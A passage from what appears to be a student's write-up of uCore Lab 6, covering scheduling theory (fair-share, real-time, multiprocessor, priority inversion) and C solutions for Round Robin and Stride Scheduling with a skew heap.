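Fair Share Scheduling (FSS)</h4><p>FSS controls users' access to system resources.</p><ul><li>Some user groups are more important than others.</li><li>Less important groups must not be able to monopolize resources.<ul><li>Unused resources are distributed proportionally.</li><li>Groups that have not reached their resource-usage target get higher priority.</li></ul></li></ul><h3 id="4-实时操作系统">4. Real-Time Operating Systems</h3><ul><li>Definition: an operating system whose correctness depends on both its timing and its functional behavior</li><li>Performance metrics of a real-time operating system:<ul><li>Timeliness with respect to time constraints (deadlines)</li><li>Speed and average performance matter comparatively little</li></ul></li><li>Defining property of a real-time operating system: <strong>predictability</strong> of time constraints</li><li>Real-time tasks:<ul><li>Task: one computation, file read, message transfer, and so on.</li><li>Task attributes: the resources needed to complete the task and its timing parameters.</li></ul></li><li>Periodic real-time tasks: a series of similar tasks<ul><li>The task repeats at regular intervals</li><li>Period p = interval between task requests $(0&lt;p)$</li><li>Execution time e = maximum execution time $(0&lt; e &lt;p)$</li><li>Utilization $U = e/p$</li></ul></li><li>Soft and hard deadlines<ul><li>Hard deadline<ul><li>Missing the deadline leads to <strong>catastrophic or very severe consequences</strong></li><li>It <strong>must</strong> be verified that the deadline is met even in the worst case</li></ul></li><li>Soft deadline<ul><li>The deadline is <strong>usually</strong> met. When it occasionally cannot be met, the requirement is relaxed</li><li>The system makes a best effort to meet the deadline.</li></ul></li></ul></li><li>Real-time scheduling<ul><li>Rate Monotonic scheduling (RM)<ul><li>Priorities are assigned by period</li><li>The shorter the period, the higher the priority</li><li>Run the task with the shortest period.</li></ul></li><li>Earliest Deadline First (EDF)<ul><li>The earlier the deadline, the higher the priority</li><li>Run the task with the earliest deadline</li></ul></li></ul></li></ul><h3 id="5-多处理器调度">5. Multiprocessor Scheduling</h3><ul><li>Characteristics of multiprocessor scheduling<ul><li>Multiple processors form one multiprocessing system</li><li>Load can be shared among processors</li></ul></li><li>Symmetric multiprocessing (SMP) scheduling<ul><li>Each processor runs its own scheduler</li><li>Schedulers must synchronize their access to shared resources</li></ul></li><li>Process assignment on symmetric multiprocessors<ul><li>Static assignment<ul><li>A process is assigned to one fixed processor from start to finish</li><li>Each processor has its own ready queue</li><li>Scheduling overhead is low</li><li>Processors may be unevenly loaded (for example, <em>one core works while seven cores watch</em> XD)</li></ul></li><li>Dynamic assignment<ul><li>During execution a process can be assigned to any idle processor</li><li>All processors share one common ready queue</li><li>Scheduling overhead is high</li><li>Load is balanced across processors</li></ul></li></ul></li></ul><h3 id="6-优先级反置">6. 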
Priority Inversion</h3><blockquote><p>Priority inversion is the situation in an operating system where a <strong>high-priority process</strong> waits for a long time on a <strong>resource held</strong> by a <strong>low-priority process</strong>.</p><p>Priority-based preemptive scheduling algorithms are subject to priority inversion.</p></blockquote><ul><li>Priority Inheritance<ul><li>The <strong>low-priority</strong> process holding the resource <strong>inherits</strong> the priority of the <strong>high-priority</strong> process requesting it.</li><li>The priority of the holder is raised only <strong>when it is actually blocking</strong> a higher-priority process.</li></ul></li><li>Priority ceiling protocol<ul><li>The process holding a resource runs at the highest priority among all processes that may request that resource.</li><li>The priority of the holder is raised whether or not anyone is actually waiting.</li><li>A task whose priority is higher than the priority ceilings of all locked resources in the system will not be blocked when it enters a critical section.</li></ul></li></ul><h2 id="练习解答">Exercise Solutions</h2><h3 id="0-练习0">0) Exercise 0</h3><blockquote><p>Fill in the code from the previous labs</p></blockquote><p>First copy over the relevant Lab5 code, then modify two places: the initialization in <code>alloc_proc</code>, and the <strong>timer interrupt</strong> case in the trap handler.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> * <span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span 
class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        proc-&gt;state = PROC_UNINIT;</span><br><span class="line">        proc-&gt;pid = <span class="number">-1</span>;</span><br><span class="line">        proc-&gt;runs = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;kstack = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;parent = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="built_in">memset</span>(&amp;(proc-&gt;context), <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> context));</span><br><span class="line">        proc-&gt;tf = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;cr3 = boot_cr3;</span><br><span class="line">        proc-&gt;flags = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">memset</span>(proc-&gt;name, <span class="number">0</span>, PROC_NAME_LEN);</span><br><span class="line">        <span class="comment">// Lab5 code</span></span><br><span class="line">        proc-&gt;wait_state = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;cptr = proc-&gt;optr = proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// Lab6: newly added code</span></span><br><span class="line">        proc-&gt;rq = <span class="literal">NULL</span>;</span><br><span class="line">        <span 
class="built_in">list_init</span>(&amp;(proc-&gt;run_link));</span><br><span class="line">        proc-&gt;time_slice = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;lab6_run_pool.left = proc-&gt;lab6_run_pool.right = proc-&gt;lab6_run_pool.parent = <span class="literal">NULL</span>;</span><br><span class="line">        proc-&gt;lab6_stride = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;lab6_priority = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">    ticks++;</span><br><span class="line">    <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">sched_class_proc_tick</span>(current);</span><br><span class="line">    <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure><h3 id="1-练习1">1) Exercise 1</h3><blockquote><p>Use the Round Robin scheduling algorithm (no coding required)</p></blockquote><ul><li><p>Understand and analyze how each function pointer in sched_class is used, and describe the scheduling process of ucore under the Round Robin algorithm</p><ul><li>How each function pointer in <code>sched_class</code> is used<ul><li><p><code>sched_class</code> is defined as follows</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// The introduction of scheduling classes is borrrowed from Linux, and makes the</span></span><br><span class="line"><span class="comment">// core scheduler quite extensible. These classes (the scheduler modules) encapsulate</span></span><br><span class="line"><span class="comment">// the scheduling policies.</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sched_class</span> &#123;</span><br><span class="line">    <span class="comment">// the name of sched_class</span></span><br><span class="line">    <span class="type">const</span> <span class="type">char</span> *name;</span><br><span class="line">    <span class="comment">// Init the run queue</span></span><br><span class="line">    <span class="built_in">void</span> (*init)(<span class="keyword">struct</span> run_queue *rq);</span><br><span class="line">    <span class="comment">// put the proc into runqueue, and this function must be called with rq_lock</span></span><br><span class="line">    <span class="built_in">void</span> (*enqueue)(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc);</span><br><span class="line">    <span class="comment">// get the proc out runqueue, and this function must be called with rq_lock</span></span><br><span class="line">    <span class="built_in">void</span> (*dequeue)(<span class="keyword">struct</span> run_queue *rq, <span 
class="keyword">struct</span> proc_struct *proc);</span><br><span class="line">    <span class="comment">// choose the next runnable task</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *(*pick_next)(<span class="keyword">struct</span> run_queue *rq);</span><br><span class="line">    <span class="comment">// dealer of the time-tick</span></span><br><span class="line">    <span class="built_in">void</span> (*proc_tick)(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc);</span><br><span class="line">    <span class="comment">/* for SMP support in the future</span></span><br><span class="line"><span class="comment">     *  load_balance</span></span><br><span class="line"><span class="comment">     *     void (*load_balance)(struct rq* rq);</span></span><br><span class="line"><span class="comment">     *  get some proc from this rq, used in load_balance,</span></span><br><span class="line"><span class="comment">     *  return value is the num of gotten proc</span></span><br><span class="line"><span class="comment">     *  int (*get_proc)(struct rq* rq, struct proc* procs_moved[]);</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>Here, <code>const char *name</code> points to a string holding <strong>the name of the current scheduling algorithm</strong></p></li><li><p><code>void (*init)(struct run_queue *rq)</code> <strong>initializes</strong> the ready queue passed in. The RR implementation initializes the <code>run_list</code> member of the <code>run_queue</code> and resets its process count to 0.</p></li></ul></li></ul><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span 
class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_init</span><span class="params">(<span class="keyword">struct</span> run_queue *rq)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">list_init</span>(&amp;(rq-&gt;run_list));</span><br><span class="line">    rq-&gt;proc_num = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p><code>void (*enqueue)(struct run_queue *rq, struct proc_struct *proc)</code> <strong>adds</strong> a process to the queue passed in. Besides appending the process to the queue, the RR implementation also resets its time slice when that slice is 0 or larger than the maximum allowed by the queue.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_enqueue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">list_empty</span>(&amp;(proc-&gt;run_link)));</span><br><span class="line">    <span class="built_in">list_add_before</span>(&amp;(rq-&gt;run_list), &amp;(proc-&gt;run_link));</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span> || proc-&gt;time_slice &gt; rq-&gt;max_time_slice) &#123;</span><br><span class="line">        proc-&gt;time_slice = rq-&gt;max_time_slice;</span><br><span class="line">    &#125;</span><br><span class="line">    proc-&gt;rq = 
rq;</span><br><span class="line">    rq-&gt;proc_num ++;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>void (*dequeue)(struct run_queue *rq, struct proc_struct *proc)</code> <strong>removes</strong> a process from the queue passed in. The RR implementation is shown here:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_dequeue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(!<span class="built_in">list_empty</span>(&amp;(proc-&gt;run_link)) &amp;&amp; proc-&gt;rq == rq);</span><br><span class="line">    <span class="built_in">list_del_init</span>(&amp;(proc-&gt;run_link));</span><br><span class="line">    rq-&gt;proc_num --;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>struct proc_struct *(*pick_next)(struct run_queue *rq)</code> <strong>selects</strong> the process best suited to run next from the ready queue passed in (<strong>it selects the process but does not remove it from the queue</strong>). The RR implementation always picks the process at the head of the queue.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *</span><br><span 
class="line"><span class="built_in">RR_pick_next</span>(<span class="keyword">struct</span> run_queue *rq) &#123;</span><br><span class="line">    <span class="type">list_entry_t</span> *le = <span class="built_in">list_next</span>(&amp;(rq-&gt;run_list));</span><br><span class="line">    <span class="keyword">if</span> (le != &amp;(rq-&gt;run_list)) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">le2proc</span>(le, run_link);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>void (*proc_tick)(struct run_queue *rq, struct proc_struct *proc)</code> is called from the timer interrupt handler to decrement the remaining time slice of the running process. When the time slice is used up, it sets <code>need_resched</code> of the current process to 1.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">RR_proc_tick</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;time_slice --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>The scheduling process of uCore under the <code>Round Robin</code> algorithm</p><ul><li><p>First, uCore calls <code>sched_init</code> to initialize the ready queue.</p></li><li><p>Then, in <code>proc_init</code>, it creates the first kernel process and adds it to the ready queue.</p></li><li><p>Once all initialization is done, uCore runs <code>cpu_idle</code>. Inside the <code>schedule</code> function it calls, <code>sched_class_enqueue</code> puts the <strong>current process</strong> back on the ready queue if it is still runnable (because the current process is about to be switched off the CPU).<br>Next, <code>sched_class_pick_next</code> fetches a process from the ready queue that can be switched onto the CPU. If one is available, <code>sched_class_dequeue</code> removes it from the ready queue, and <code>proc_run</code> then performs the context switch.</p></li><li><p>Note that every timer interrupt calls <code>sched_class_proc_tick</code>, which decrements the remaining time slice of the running process. When the time slice reaches 0, <code>need_resched</code> is set to 1, and after the timer interrupt handler returns, the rest of the <code>trap</code> function performs the process switch.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">trap</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (current == <span 
class="literal">NULL</span>)</span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> trapframe *otf = current-&gt;tf;</span><br><span class="line">        current-&gt;tf = tf;</span><br><span class="line">  </span><br><span class="line">        <span class="type">bool</span> in_kernel = <span class="built_in">trap_in_kernel</span>(tf);</span><br><span class="line">        <span class="comment">// Run the matching interrupt handler</span></span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">        <span class="comment">// Restore the previous trapframe</span></span><br><span class="line">        current-&gt;tf = otf;</span><br><span class="line">        <span class="comment">// If the interrupt arrived while a user process was running</span></span><br><span class="line">        <span class="comment">// (this is where user processes turn out to be preemptible)</span></span><br><span class="line">        <span class="keyword">if</span> (!in_kernel) &#123;</span><br><span class="line">            <span class="keyword">if</span> (current-&gt;flags &amp; PF_EXITING)</span><br><span class="line">                <span class="built_in">do_exit</span>(-E_KILLED);</span><br><span class="line">            <span class="comment">// If the handler set need_resched to 1, switch processes here</span></span><br><span class="line">            <span class="keyword">if</span> (current-&gt;need_resched)</span><br><span class="line">                <span class="built_in">schedule</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span 
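class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul></li><li><p>Briefly explain in the lab report how you would design and implement "Multilevel Feedback Queue scheduling"; give an outline design, and a detailed design is encouraged</p><ul><li><p>MLFQ is similar to Round Robin, but not identical. It needs several <code>run_queue</code>s, and the <code>max_time_slice</code> of these queues should grow as their priority decreases.</p></li><li><p>In <code>sched_init</code>, first initialize these <code>run_queue</code>s and assign their <code>max_time_slice</code> values in increasing order, from the highest-priority queue to the lowest.</p><blockquote><p>For example, queue 1 gets a <code>max_time_slice</code> of 3, queue 2 gets 5, and queue 3 gets 7.</p></blockquote></li><li><p>When <code>sched_class_enqueue</code> runs, first check whether the process is newly created. If so, add it to the highest-priority queue (the one with the shortest time slice). If it is an old process (one that has already used the CPU one or more times without finishing), add it to the next lower-priority queue, because a process that still has not finished after using its time slice is more likely to be CPU-bound.</p><blockquote><p>If the process was already in the lowest-priority queue, put it back into that same queue.</p></blockquote></li><li><p><code>sched_class_pick_next</code> has a bit more to do. It first has to decide which process from which queue should run next. To keep the code simple, we can always switch to the <strong>first</strong> process in the chosen queue (the one that has <strong>waited</strong> the longest).</p><p>Choosing the queue cannot be that simple, though: if we always just run processes from the <strong>first queue</strong>, <strong>starvation</strong> is very likely, meaning low-priority processes go without the CPU for a long time. So we can give each queue a <strong>fixed amount or fixed percentage</strong> of CPU time. For example, add a <code>max_list_time_slice</code> attribute to each queue and initialize it; once the <strong>total running time</strong> of the processes in the current queue exceeds the <code>max_list_time_slice</code> of that queue (its <strong>maximum run-time budget</strong>), the CPU switches to a process in the next queue.</p></li></ul></li></ul><h3 id="2-练习2">2) Exercise 2</h3><blockquote><p>Implement the Stride Scheduling algorithm (coding required)</p></blockquote><h4 id="a-Stride调度算法的相关介绍">a. 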
Introduction to Stride Scheduling</h4><p>The Round-Robin algorithm in uCore ensures that every process gets an equal share of the CPU, but we would like the scheduler to allocate CPU time more intelligently, so that <strong>the CPU time each process receives is proportional to its priority</strong>. Stride Scheduling is a typical and simple algorithm of this kind.</p><p>The algorithm has the following properties:</p><ul><li>Simple to implement</li><li>Controllable: it can be shown that the number of times Stride Scheduling schedules a process is proportional to its priority</li><li>Deterministic: leaving timer events aside, the whole scheduling mechanism is predictable and reproducible.</li></ul><p>The basic idea is as follows:</p><ol><li>Give every runnable process a current state value, stride, which represents its current position in the scheduling order. Also define a pass value for it, which is the amount added to stride each time the process is scheduled.</li><li>Whenever scheduling is needed, pick the runnable process with the smallest stride.</li><li>For the chosen process P, add its step size pass (which depends only on the priority of the process) to its stride.</li><li>After a fixed period of time, go back to step 2 and again schedule the process with the smallest stride.</li></ol><blockquote><p>It can be shown that if P.pass = BigStride / P.priority, where P.priority is the priority of the process (at least 1) and BigStride is a large predefined constant, then the time this scheme gives each process is proportional to its priority.</p></blockquote><p>There is one point to watch out for. As processes run, their stride values keep growing, so integer overflow is possible. Once a stride has overflowed, a naive comparison can give the wrong answer. What should we do about it?</p><p>There is a useful invariant: <code>STRIDE_MAX - STRIDE_MIN &lt;= PASS_MAX == BIG_STRIDE / 1</code> (note that the smallest priority is 1). So as long as <code>BIG_STRIDE</code> is kept within a suitable bound, <strong>the difference between any two strides always fits in the machine integer range</strong>.</p><p>In addition, under unsigned arithmetic, subtracting a stride that has not yet wrapped around from one that has wrapped around <strong>still gives the correct result</strong>. For example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">uint32_t</span> a = ((<span class="type">uint32_t</span>) <span class="number">-1</span>); <span class="comment">// a is now the largest uint32_t value</span></span><br><span class="line"><span class="type">uint32_t</span> b = <span class="number">4</span>;</span><br><span class="line">cout &lt;&lt; b - a; <span class="comment">// prints 5: the wrapped-around 4 is 5 steps ahead of ((uint32_t) -1)</span></span><br></pre></td></tr></table></figure><p>The comparison function interprets the difference of two strides as a signed 32-bit integer (<code>int32_t</code>), while stride itself is stored as a <code>uint32_t</code> in uCore. So <code>BIG_STRIDE</code> must be no larger than <code>0x7FFFFFFF</code>, the largest positive <code>int32_t</code> value; with that bound, stride overflow no longer leads to wrong comparisons.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span 
class="keyword">define</span> BIG_STRIDE 0x7FFFFFFF</span></span><br></pre></td></tr></table></figure><p>Because <code>Stride Scheduling</code> performs many lookups, we can use the <code>skew_heap</code> data structure to make it more efficient. uCore already provides it, so we can simply call it without worrying about its internals.</p><h4 id="b-具体实现">b. Implementation</h4><ul><li><p><code>stride_init</code> is a plain and simple initialization</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_init</span><span class="params">(<span class="keyword">struct</span> run_queue *rq)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">list_init</span>(&amp;(rq-&gt;run_list));</span><br><span class="line">    <span class="comment">// Do not call skew_heap_init(rq-&gt;lab6_run_pool) here</span></span><br><span class="line">    rq-&gt;lab6_run_pool = <span class="literal">NULL</span>;</span><br><span class="line">    rq-&gt;proc_num = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note that <code>rq-&gt;lab6_run_pool</code> should be initialized by assigning NULL directly rather than by calling <code>skew_heap_init</code>, because <code>rq-&gt;lab6_run_pool</code> <strong>is only a pointer, not an object</strong>.</p></li><li><p><code>stride_enqueue</code> and <code>stride_dequeue</code> differ little from their RR counterparts</p><p>Keep in mind, though, that after inserting or removing a process <strong>you must update the <code>rq-&gt;lab6_run_pool</code> pointer!</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_enqueue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    rq-&gt;lab6_run_pool = <span class="built_in">skew_heap_insert</span>(rq-&gt;lab6_run_pool, &amp;(proc-&gt;lab6_run_pool), proc_stride_comp_f);</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span> || proc-&gt;time_slice &gt; rq-&gt;max_time_slice) &#123;</span><br><span class="line">        proc-&gt;time_slice = rq-&gt;max_time_slice;</span><br><span class="line">    &#125;</span><br><span class="line">    proc-&gt;rq = rq;</span><br><span class="line">    rq-&gt;proc_num ++;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_dequeue</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    rq-&gt;lab6_run_pool = <span class="built_in">skew_heap_remove</span>(rq-&gt;lab6_run_pool, &amp;(proc-&gt;lab6_run_pool), proc_stride_comp_f);</span><br><span class="line">    rq-&gt;proc_num --;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>pick_next</code> has to select the process with the smallest <code>stride</code> value and then update that <code>stride</code>.</p><p>uCore already provides the source of <code>proc_stride_comp_f</code>; reading it together with the skew heap code shows that <strong>the process with the smallest stride sits at the top of the skew heap</strong>. So <code>pick_next</code> can simply take the process that <code>rq-&gt;lab6_run_pool</code> points to.</p><p>The <code>stride</code> value is updated by adding <code>BIG_STRIDE / p-&gt;lab6_priority</code> to it. One thing to watch out for: division by 0 is not allowed, so <code>alloc_proc</code> must initialize the <code>priority</code> of every process to 1.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">proc_stride_comp_f</span><span class="params">(<span class="type">void</span> *a, <span class="type">void</span> *b)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">     <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *p = <span class="built_in">le2proc</span>(a, lab6_run_pool);</span><br><span class="line">     <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *q = <span 
class="built_in">le2proc</span>(b, lab6_run_pool);</span><br><span class="line">     <span class="type">int32_t</span> c = p-&gt;lab6_stride - q-&gt;lab6_stride;</span><br><span class="line">     <span class="keyword">if</span> (c &gt; <span class="number">0</span>) <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">     <span class="keyword">else</span> <span class="keyword">if</span> (c == <span class="number">0</span>) <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">     <span class="keyword">else</span> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *</span><br><span class="line"><span class="built_in">stride_pick_next</span>(<span class="keyword">struct</span> run_queue *rq) &#123;</span><br><span class="line">    <span class="type">skew_heap_entry_t</span>* she = rq-&gt;lab6_run_pool;</span><br><span class="line">    <span class="keyword">if</span> (she != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">proc_struct</span>* p = <span class="built_in">le2proc</span>(she, lab6_run_pool);</span><br><span class="line">        p-&gt;lab6_stride += BIG_STRIDE / p-&gt;lab6_priority;</span><br><span class="line">        <span class="keyword">return</span> p;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>stride_proc_tick</code> is identical to the RR version, so it is not discussed again here</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
